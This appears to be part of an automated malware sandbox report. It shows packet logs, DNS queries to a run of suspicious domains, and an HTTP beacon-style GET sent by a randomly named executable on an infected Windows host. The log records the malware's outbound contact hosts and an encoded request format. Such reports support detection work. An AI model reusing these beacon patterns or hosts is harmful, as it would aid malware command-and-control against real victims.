                                                                                                                    Oct 9, 2024 14:21:45.788933039 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:45.789041996 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:45.789055109 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:45.789067984 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:45.789079905 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:45.789096117 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:46.251813889 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:46.255503893 CEST4965880192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:47.295505047 CEST4965880192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:47.300457954 CEST8049658172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:48.314754963 CEST4965980192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:48.319984913 CEST8049659172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:48.320089102 CEST4965980192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:48.327440977 CEST4965980192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:48.332288980 CEST8049659172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:48.798146963 CEST8049659172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:48.799048901 CEST8049659172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:48.803534031 CEST4965980192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:48.804349899 CEST4965980192.168.2.4172.191.244.62
                                                                                                                    Oct 9, 2024 14:21:48.809211016 CEST8049659172.191.244.62192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:53.952815056 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:53.958069086 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:53.958168030 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:53.970863104 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:53.976223946 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748464108 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748496056 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748513937 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748573065 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748594999 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748601913 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:54.748610973 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748630047 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:54.748728991 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:54.748764038 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748780012 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748795986 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748812914 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.748843908 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:54.751863956 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:54.753530979 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.753549099 CEST8049660162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:54.753654003 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:55.482789993 CEST4966080192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:56.501629114 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:56.506567955 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:56.508879900 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:56.519336939 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:56.524182081 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326114893 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326128960 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326143026 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326170921 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:57.326210022 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326221943 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326234102 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326244116 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:57.326246977 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326277971 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:57.326316118 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326356888 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:57.326405048 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326416016 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.326462030 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:57.331146002 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.331156015 CEST8049661162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:57.331187010 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:58.029786110 CEST4966180192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.048758030 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.053668022 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.054306984 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.067800999 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.072699070 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072712898 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072736979 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072747946 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072757959 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072768927 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072778940 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072837114 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.072846889 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854446888 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854465961 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854479074 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854512930 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.854553938 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854567051 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854578972 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854595900 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.854597092 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854626894 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.854715109 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854729891 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854747057 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.854764938 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.854784012 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:21:59.859499931 CEST8049662162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:59.907407045 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:00.578711987 CEST4966280192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:01.596604109 CEST4966380192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:01.601552963 CEST8049663162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:01.601692915 CEST4966380192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:01.610969067 CEST4966380192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:01.616003036 CEST8049663162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:02.429029942 CEST8049663162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:02.484919071 CEST4966380192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:04.090207100 CEST8049663162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:04.090631008 CEST4966380192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:04.092261076 CEST4966380192.168.2.4162.241.244.106
                                                                                                                    Oct 9, 2024 14:22:04.097258091 CEST8049663162.241.244.106192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.170392990 CEST4967180192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:09.175474882 CEST8049671199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.175556898 CEST4967180192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:09.188841105 CEST4967180192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:09.194664955 CEST8049671199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.653481960 CEST8049671199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.654592991 CEST8049671199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.654766083 CEST4967180192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:09.656296968 CEST8049671199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.656373978 CEST4967180192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:10.703083038 CEST4967180192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:11.720880985 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:11.725852013 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:11.725948095 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:11.739000082 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:11.743851900 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:12.189127922 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:12.189147949 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:12.189264059 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:12.189282894 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:12.189368963 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:13.248573065 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.269112110 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.274089098 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.274183035 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.289009094 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.293849945 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293901920 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293919086 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293932915 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293942928 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293977022 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.294049025 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.294099092 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.294183969 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.726465940 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.726486921 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.726610899 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.726816893 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.727458000 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:15.795530081 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.814179897 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.819495916 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:16.825107098 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.832210064 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.837450027 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.289824009 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.289931059 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.290026903 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:17.290051937 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.290096998 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:17.294362068 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:17.299520969 CEST8049674199.59.243.227192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 9, 2024 14:18:46.066627979 CEST53591741.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:07.386020899 CEST5373153192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:07.399467945 CEST53537311.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:23.658592939 CEST5742053192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:24.037482977 CEST53574201.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:38.593966007 CEST6521453192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:38.619972944 CEST53652141.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:51.969414949 CEST4983853192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:51.979980946 CEST53498381.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:00.053950071 CEST5728553192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:00.067641973 CEST53572851.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:14.157744884 CEST5263953192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:14.689730883 CEST53526391.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:28.860270023 CEST6350353192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:29.055114985 CEST53635031.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:42.642966986 CEST6237553192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:42.658792019 CEST53623751.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:56.740211010 CEST6325453192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:57.195081949 CEST53632541.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:10.908121109 CEST6122253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:11.923410892 CEST6122253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:12.203754902 CEST53612221.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:12.203768969 CEST53612221.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:25.658981085 CEST6442853192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:25.851200104 CEST53644281.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:39.986994028 CEST6418953192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:40.495313883 CEST53641891.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:53.814878941 CEST5108253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:53.938647032 CEST53510821.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.103234053 CEST5819253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:22:09.167215109 CEST53581921.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:22.299232006 CEST5099053192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:22:22.307487965 CEST53509901.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:28.922280073 CEST6514453192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:22:28.929727077 CEST53651441.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Oct 9, 2024 14:19:07.386020899 CEST192.168.2.41.1.1.10xe199Standard query (0)www.newdaydawning.netA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:23.658592939 CEST192.168.2.41.1.1.10x3f17Standard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:38.593966007 CEST192.168.2.41.1.1.10x7897Standard query (0)www.uburn.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:51.969414949 CEST192.168.2.41.1.1.10xe64Standard query (0)www.i16zb920d.cfdA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:00.053950071 CEST192.168.2.41.1.1.10x7c2cStandard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:14.157744884 CEST192.168.2.41.1.1.10xbc6fStandard query (0)www.nakama2-sshl.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:28.860270023 CEST192.168.2.41.1.1.10x53d0Standard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:42.642966986 CEST192.168.2.41.1.1.10x2e23Standard query (0)www.tukaari.shopA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:56.740211010 CEST192.168.2.41.1.1.10x5028Standard query (0)www.prj81oqde1.buzzA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:10.908121109 CEST192.168.2.41.1.1.10xab09Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:11.923410892 CEST192.168.2.41.1.1.10xab09Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:25.658981085 CEST192.168.2.41.1.1.10xf137Standard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:39.986994028 CEST192.168.2.41.1.1.10x969bStandard query (0)www.lurknlarkk.xyzA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:53.814878941 CEST192.168.2.41.1.1.10x2af6Standard query (0)www.mommymode.siteA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:22:09.103234053 CEST192.168.2.41.1.1.10xc3adStandard query (0)www.polarmuseum.infoA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:22:22.299232006 CEST192.168.2.41.1.1.10x18d4Standard query (0)wwwA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:22:28.922280073 CEST192.168.2.41.1.1.10xfdb1Standard query (0)wwwA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Oct 9, 2024 14:19:07.399467945 CEST1.1.1.1192.168.2.40xe199No error (0)www.newdaydawning.netnewdaydawning.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:07.399467945 CEST1.1.1.1192.168.2.40xe199No error (0)newdaydawning.net44.213.25.70A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:24.037482977 CEST1.1.1.1192.168.2.40x3f17No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:24.037482977 CEST1.1.1.1192.168.2.40x3f17No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:38.619972944 CEST1.1.1.1192.168.2.40x7897No error (0)www.uburn.xyz67.223.117.189A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:19:51.979980946 CEST1.1.1.1192.168.2.40xe64Name error (3)www.i16zb920d.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:00.067641973 CEST1.1.1.1192.168.2.40x7c2cNo error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:00.067641973 CEST1.1.1.1192.168.2.40x7c2cNo error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:00.067641973 CEST1.1.1.1192.168.2.40x7c2cNo error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:14.689730883 CEST1.1.1.1192.168.2.40xbc6fNo error (0)www.nakama2-sshl.xyz183.181.83.131A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:29.055114985 CEST1.1.1.1192.168.2.40x53d0No error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:29.055114985 CEST1.1.1.1192.168.2.40x53d0No error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:42.658792019 CEST1.1.1.1192.168.2.40x2e23No error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:42.658792019 CEST1.1.1.1192.168.2.40x2e23No error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:42.658792019 CEST1.1.1.1192.168.2.40x2e23No error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:20:57.195081949 CEST1.1.1.1192.168.2.40x5028No error (0)www.prj81oqde1.buzz154.212.219.2A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:12.203754902 CEST1.1.1.1192.168.2.40xab09No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:12.203754902 CEST1.1.1.1192.168.2.40xab09No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:12.203768969 CEST1.1.1.1192.168.2.40xab09No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:12.203768969 CEST1.1.1.1192.168.2.40xab09No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:25.851200104 CEST1.1.1.1192.168.2.40xf137No error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:25.851200104 CEST1.1.1.1192.168.2.40xf137No error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:25.851200104 CEST1.1.1.1192.168.2.40xf137No error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:40.495313883 CEST1.1.1.1192.168.2.40x969bNo error (0)www.lurknlarkk.xyzredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:40.495313883 CEST1.1.1.1192.168.2.40x969bNo error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:53.938647032 CEST1.1.1.1192.168.2.40x2af6No error (0)www.mommymode.sitemommymode.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:21:53.938647032 CEST1.1.1.1192.168.2.40x2af6No error (0)mommymode.site162.241.244.106A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:22:09.167215109 CEST1.1.1.1192.168.2.40xc3adNo error (0)www.polarmuseum.info199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:22:22.307487965 CEST1.1.1.1192.168.2.40x18d4Name error (3)wwwnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Oct 9, 2024 14:22:28.929727077 CEST1.1.1.1192.168.2.40xfdb1Name error (3)wwwnonenoneA (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.newdaydawning.net
                                                                                                                    • www.40wxd.top
                                                                                                                    • www.uburn.xyz
                                                                                                                    • www.o731lh.vip
                                                                                                                    • www.nakama2-sshl.xyz
                                                                                                                    • www.zz82x.top
                                                                                                                    • www.tukaari.shop
                                                                                                                    • www.prj81oqde1.buzz
                                                                                                                    • www.komart.shop
                                                                                                                    • www.healthyloveforall.net
                                                                                                                    • www.lurknlarkk.xyz
                                                                                                                    • www.mommymode.site
                                                                                                                    • www.polarmuseum.info

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.44935244.213.25.70803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:07.432673931 CEST467OUTGET /7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.newdaydawning.net
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:19:08.596672058 CEST481INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:07 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
